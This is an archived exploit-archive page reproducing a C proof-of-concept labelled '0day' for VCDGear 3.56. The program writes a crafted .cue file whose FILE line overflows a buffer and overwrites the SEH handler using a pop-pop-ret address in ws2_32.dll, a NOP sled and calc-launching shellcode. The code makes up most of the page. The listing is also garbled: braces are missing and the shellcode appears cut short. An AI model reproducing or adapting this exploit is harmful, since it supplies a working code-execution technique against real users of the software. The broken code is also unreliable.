AOH :: HP Unsorted V :: TB10396.HTM

VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit

VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit
VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit

/* ~~~~~~~~~~~~~~0day~~~~~~~~~~~~~~~~~~
Discovered by: C-W-M
Auther: C-W-M ~ Www.MeftunNet.Com & Www.HackerSecurity.Org 
Location : Turkey...
Attack Vector: SEH overwrite
Type: Local
Tested on Win2k SP4 (English)

Software: VCDGear v3.56 build 050213

"VCDGear is a program designed to allow a user to extract MPEG streams from CD images, convert VCD files to MPEG, 
correct MPEG errors, and more -- all in a single step. Initially developed back in late 1997, the program has 
grown to do various extractions, conversions, and corrections on the fly. Cross-platform support will allow 
different machines to process and generate output that is compatible between one another. 

Total Buf Size: 2512 - [Junk - 324][SEH overwrite - 8][NOP Sled and Shellcode room for - 2180]

Greetz: Ekobar, Poizonb0X, eno7, Doublekickx #pen15


// Exec Calc.exe Scode
unsigned char scode[] "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"

int main(int argc, char *argv[])
	FILE *handle;

	if(argc < 2) {
		printf("0day VCDGear exploit\n");
		printf("Usage: %s ", argv[0]);
		return 0;

	if(!(handle = fopen(argv[1], "w"))) {
		printf("[+] Error");
		return 0;

	fputs("FILE \"", handle);
	for (int i=0;i<324;i++) \
		fputs("A", handle);
	fputs("\xeb\x32\x90\x90", handle);
	fputs("\x3a\x1f\x03\x75", handle); //pop edi, pop esi, retn in ws2_32.dll (English / 	5.0.2195.6601)
	for (i=0;i<200;i++) 
		fputs("\x90", handle);

	fputs((char *)scode, handle);
	fputs("\" BINARY\n", handle);
	fputs(" TRACK 01 MODE2/2352\n", handle);
	fputs(" INDEX 01 00:00:00\n", handle);
	printf("[+] File successfully created");

	return 0;

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an email address, please forward it with full headers to